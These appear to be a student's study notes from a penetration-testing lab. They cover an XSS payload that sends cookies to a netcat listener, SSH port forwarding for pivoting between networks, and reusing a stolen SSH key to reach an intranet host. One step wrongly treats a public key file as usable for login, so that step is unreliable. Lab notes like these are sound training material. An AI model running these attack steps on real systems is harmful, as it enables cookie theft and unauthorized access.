tedock/Study/Studykeygennotesday4.md

 ssh www-data@localhost -p2222
 (this may give an error, run the ssh-keygen command it shows)

+Instead of /var/www , it may be within a systems user.
+This could be seen as /home/Comrade/.ssh/authorized_keys If you are going into someone's ssh known as comrade.
+This can be applied into the lesson by using the extranet.

 ################################
 Cross-Site Scripting:
 ################################
 nc -l 127.0.0.1 42070
 <script>document.location="http://127.0.0.1:42070/?username=" + document.cookie;</script>

+When going from extranet into intra net, you are setting up your localhost like above, the: ssh -S /tmp/DEV DEV -O forward -LLOCALPORT:extranet is going to forward your socket that you made (the master socket named DEV) and send it to the extranet IP through the port that you made to forward it (the -L PORT)
+Now when you run a localhost ssh ( ssh USERNAMEOFEXTRANET@localhost -p LOCALPORTYOUMADE) it will send you into the extranet.
+Things i need to make sure work is doing this with a -D 9050 to send proxychains, but i believe it works.
+With this you are going to then steal the ssh key OF extranet (cat ~/.ssh/id_rsa.pub) and save this key that you find into a file named StolenKey, from there you chmod 600 the folder, making sure to double check everything as to not overwrite your ssh key, and then you masquerade sshkey to get into the intranet ip you found (cat /etc/hosts , /etc/crontab) Jane will be the device name (intranet) and the IP will be intranet IP. chmod 600 /home/student/stolenkey ssh -i /home/student/stolenkey jane@1.2.3.4